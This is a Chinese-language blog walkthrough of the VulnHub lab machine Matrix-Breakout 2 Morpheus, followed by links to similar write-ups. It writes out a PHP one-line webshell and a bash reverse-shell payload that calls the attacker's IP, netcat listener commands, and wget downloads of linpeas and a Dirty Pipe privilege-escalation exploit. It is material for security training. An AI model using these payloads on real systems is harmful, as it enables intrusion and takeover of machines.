matrix-breakout-2-morpheus已完成

原创 已于 2023-07-28 11:59:31 修改 · 369 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全

于 2023-07-28 11:29:18 首次发布
准备环境

1.靶机:Matrix-Breakout: 2 Morpheus

下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

2.用到的知识点

文件上传upload-lab、

php伪协议、

反弹shell、

漏洞收集脚本LINpeas的使用

CVE-2022-0847提权

一:信息收集
1.nmap 网段扫描存活主机:

nmap -sS -T4 192.168.253.0/24

http://192.168.253.131/

在这里插入图片描述在这里插入图片描述

2.端口扫描:

nmap -A -p- 192.168.253.131

开放的端口有22、80、81,有http和ssh服务

在这里插入图片描述

3.目录扫描:

dirb http://192.168.253.131 没有扫描出来

安装gobuster
①更新下载源
apt-get update
②下载
apt-get install gobuster
③查看字典

cd /usr/share/wordlists/dirbuster

④gobuster目录扫描

gobuster dir -u http://192.168.253.131 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/fasttrack.txt
在这里插入图片描述

获取shell
1.登录网页

192.168.253.131/graffiti.php

在这里插入图片描述

2.burpsuite抓包
1).上传一句木马:
<?php @eval($_POST['a']);?>

因为post上传的是txt文件,需要抓包修改一下 改成PHP格式,然后放包

在这里插入图片描述

2).蚁剑连接

在这里插入图片描述

在这里插入图片描述

连接成功过但没有回显

反弹shell

1.可以像上面一样写入反弹shell 脚本

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.253.128/8888 0>&1'");?>

在这里插入图片描述

同样将.txt格式改成.php ,名字随意改,这里我改成了2.php ,一会访问这个2.php

2.攻击机开启监听端口8888

nc -lvvp 8888

然后访问这个2.php反弹shell,反弹成功

在这里插入图片描述

提权
1.试着SUID提权
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

没发现可以利用的文件

2.linpeas
LinPEAS 是一个没有任何依赖的脚本,它使用/bin/sh语法,用于搜索在 Linux/Unix*/MacOS 主机上搜索可能的权限提升路径。默认情况下,LinPEAS 不会向磁盘写入任何内容,也不会尝试以任何其他用户身份使用 su 。
该脚本工具枚举并搜索主机内部可能的错误配置(已知漏洞、用户、进程和文件权限、特殊文件权限、可读/可写文件、暴力破解其他用户(top1000pwds)、密码…),并用颜色突出显示可能的错误配置
1)下载地址:

https://github.com/carlospolop/PEASS-ng/releases

下载linpeas.sh

2)kali中直接安装linpeas

也可以在kali中直接下载linpeas这个脚本(这个更方便),安装后查看一下里面的文件

在这里插入图片描述

将这个脚本上传到靶机,上传后给脚本赋权 ,然后执行

先起http:

python3 -m http.server 80

下载到靶机上:

wget http://192.168.253.128:80/linpeas_fat.sh

赋权:

chmod +x linpeas_fat.sh

执行:

./linpeas_fat.sh

检测出来的漏洞,CVE-2022-0847

在这里插入图片描述

在kali上下载这个漏洞,在github上下载

git clone https://github.com/imfiver/CVE-2022-0847.git

开启http服务,

python3 -m http.server 80

靶机下载,

wget http://192.168.253.128:80/CVE-2022-0847/Dirty-Pipe.sh

赋权、执行

chmod +x Dirty-Pipe.sh
./Dirty-Pipe.sh

在这里插入图片描述

cd /
ls
cat FLAG.txt

在这里插入图片描述

qaqCL
关注
Tre靶场通关过程(linpeas使用+启动项编辑器提权)
tpaer的博客
05-07 2721
通过信息收集获得到了普通用户账号密码,利用PEASS-ng的linpeas脚本进行提权的信息收集再进行提权。
VulnHub-matrix-breakout-2-morpheus通关攻略
最新发布
m0_66808441的博客
03-19 986
【代码】VulnHub-matrix-breakout-2-morpheus通关攻略。
Exploits:LinuxWindows漏洞利用
04-16
漏洞利用 卡利Linux 安装终结者 sudo apt-get update sudo apt-get install terminator 使用终止符 #Start Terminator #horizontal break ctrl+shift+e #Vertical break ctrl+shift+o 安装/下载linpeas.sh(系统检查器) Download linpeas.sh (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/lin
Linpeas的简单使用
Themanager112的博客
01-06 4617
是一个流行的脚本,用于在渗透测试中进行特权升级和系统枚举。要在 Kali Linux 中使用。在没有授权的情况下对系统运行渗透测试工具可能违法。并不是预装的工具,因此你不会在标准安装中找到它。,你需要手动下载和运行它。: 你可以从其 GitHub 仓库下载。请确保在合法和授权的环境中使用。在 Kali Linux 中,
linpeas.sh脚本
u011587070的专栏
12-12 933
该脚本会执行一系列的检查,包括但不限于系统配置、软件版本、不安全的文件权限、错误配置的服务等,这些检查可能会揭示出可以利用的安全漏洞,从而允许攻击者或测试者从普通用户权限提升到更高的权限,例如root。是社区中广泛使用的工具之一,它集合了许多常见的提权技术和方法,可以自动化地帮助测试者节省时间,而不是手动执行每一个检查步骤。脚本运行后,它会提供大量的信息,包括可能的安全问题和权限提升的方法。根据脚本提供的信息,尝试使用推荐的方法来提升权限。这可能包括利用某些配置错误、使用特定的工具或技术。
matrix-breakout-2-morpheus
2401_88387979的博客
12-25 638
发现网站会将提交的内容追加到graffiti.txt文件中,由于file参数是可控的,那么我们可以修改文件名改变文件上传的路径,尝试上传一句话木马到1.php中。还是将重点放回80端口,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典。在输入框中随便输入,发现输入的数据被显示到页面上,抓包。分别访问这几个端口,也没有什么发现,我们换个思路。我们从当前页面没有得到有用的信息,尝试扫描后台。测试连接成功,添加,成功获取权限。
matrix-breakout-2-morpheus靶场
weixin_45653478的博客
07-01 1053
此时猜想该POST数据中的filename参数是否可控,因为内容是可控的,只要文件名可控,那么我们就可以轻易进行文件上传了。还是将重点放回80端口,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典。通过gobuster扫描了一个几十万的字典,我们可以看到有一个graffiti.php。尝试输入1提交,并打开burp抓包啊查看,发现网站会将提交的内容追加到graffiti.txt文件中。github上找到exp。
matrix-breakout-2-morpheus 靶机----练习攻略 【仅获取shell】
qq_65379983的博客
03-19 929
vulhub/matrix-breakout-2-morpheus 靶机攻略 利用kali自带fantanshell文件进行反弹shell
Vulnhub中的Matrix-breakout2-Morpheus
在Web和Reverse坑里游泳中。。。。
01-20 977
又是收获满满的一周!
靶机渗透练习36-Corrosion
hirak0的博客
04-18 706
靶机描述 靶机地址:https://www.vulnhub.com/entry/corrosion-1,730/ Description Difficulty: Easy A easy box for beginners, but not too easy. Good Luck. Hint: Enumerate Property. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.146 注:靶机与Kali的IP地址只需要在同
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
weixin_62621015的博客
04-03 834
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
vulnhub靶场Matrix-Breakout 2 Morpheus通关攻略
2302_77611368的博客
03-19 363
继续扫描,gobuster字典更大。抓包产生是否能修改file参数。在kali监听6666端口。发现会将内容写入txt中。没找到什么有用的东西。上传shell.sh。
matrix-breakout-2-morpheus通关攻略
2302_80982453的博客
03-19 745
3,访问靶机ip和扫描出的目录,发现在192.168.50.141/graffiti.php存在输入框。4,在输入框输入内容上传,使用BP抓包拦截发现上传的内容到了graffiti.txt。1,安装好靶机后打开,打开kali扫描靶机ip,端口和目录。6,使用蚁剑进行连接,可以在根目录找到flag.txt。5,在BP中尝试写一句话木马到shell.php。2,使用gobuster再次扫描。7,反弹shell监听。
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
qq_62716256的博客
09-14 2146
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
Linux手动提权,万字基础详细教程以及经验分享
Ba1_Ma0的博客
06-03 2654
权限提升通常涉及从较低权限的帐户到较高权限的帐户。从技术上讲,它是利用操作系统或应用程序中的漏洞、设计缺陷或配置疏忽来获得对通常禁止用户访问的资源的未经授权的访问。权限提升至关重要,因为它可以让你获得系统管理员级别的访问权限,从而可以执行以下操作: 手动枚举 现在我成功的拿到了服务器的shell,但是只是一个普通用户的shell 枚举是你访问任何系统后必须采取的第一步,通过搜集本地主机上的各种信息,来达到提权的目的 该命令将返回目标机器的主机名,在某些情况下,它可以提供有关目标系统在公司网络中的角色的信
渗透靶场——HackMyVM:BlackWidow
tlovejr的博客
04-06 3334
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机ip地址:192.168.1.118 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.118 在这里发现了很多开放的端口,那么我们还是老规矩,先在80端口进
vulnhub之CengBox3
鲨鱼辣椒的博客
08-08 1611
信息搜集 扫描网段
Vulnhub靶机实战——Matrix2
小小猪的博客
06-04 1206
Vulnhub靶机实战——Matrix2 arp-scan -l,检测靶机ip地址 nmap -A -T4 -p- x.x.x.224 分别打开相关端口查看页面 在12322端口下,发现一个file_view.php文件,但在robots.txt文件发现禁用了file_view.php文件,怀疑存在任意文件包含漏洞 https://x.x.x.224:12322/robots.txt https://x.x.x.224:12322/file_view.php post请求fil
Matrix-Breakout-2-Morpheus靶机进行渗透测试
12-13
Matrix-Breakout-2-Morpheus靶机进行渗透测试是一项复杂且具有挑战性的任务。渗透测试的目的是通过模拟黑客的攻击手段,评估系统的安全性并发现潜在的安全漏洞。以下是进行渗透测试的一般步骤和方法: ### 1. 信息收集(Reconnaissance) 在开始渗透测试之前,首先需要进行信息收集。信息收集的目的是尽可能多地了解目标系统,包括操作系统类型、开放端口、服务版本等。 - **使用Nmap扫描端口**:Nmap是一个强大的网络扫描工具,可以扫描目标系统的开放端口和服务。 ```sh nmap -sS -sV -O <目标IP> ``` - **使用Nikto扫描Web漏洞**:Nikto是一个Web服务器扫描工具,可以扫描常见的Web漏洞。 ```sh nikto -h <目标IP> ``` ### 2. 漏洞扫描(Vulnerability Scanning) 在信息收集的基础上,进行漏洞扫描,识别系统中的已知漏洞。 - **使用OpenVAS进行漏洞扫描**:OpenVAS是一个开源的漏洞扫描工具,可以自动扫描系统中的漏洞。 ```sh openvas-scan <目标IP> ``` ### 3. 漏洞利用(Exploitation) 一旦识别出系统中的漏洞,就可以尝试利用这些漏洞来获取系统的访问权限。 - **使用Metasploit进行漏洞利用**:Metasploit是一个流行的渗透测试框架,提供了大量的漏洞利用模块。 ```sh msfconsole use exploit/<模块名称> set RHOST <目标IP> set PAYLOAD <有效载荷> exploit ``` ### 4. 权限提升(Privilege Escalation) 获取系统访问权限后,通常需要提升权限以获得更高的访问级别。 - **使用本地提权工具**:例如,Linux系统中的`sudo -l`命令可以查看当前用户可以执行的命令,Windows系统中的`whoami /priv`命令可以查看当前用户的权限。 ### 5. 后渗透操作(Post-Exploitation) 在获取系统权限后,可以进行后渗透操作,例如数据窃取、系统破坏等。 - **使用Meterpreter进行后渗透操作**:Meterpreter是Metasploit中的一个后渗透模块,提供了丰富的功能。 ```sh meterpreter > sysinfo meterpreter > download <文件路径> ``` ### 6. 报告(Reporting) 最后,生成渗透测试报告,详细记录测试过程中发现的问题和漏洞,并提出修复建议。
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值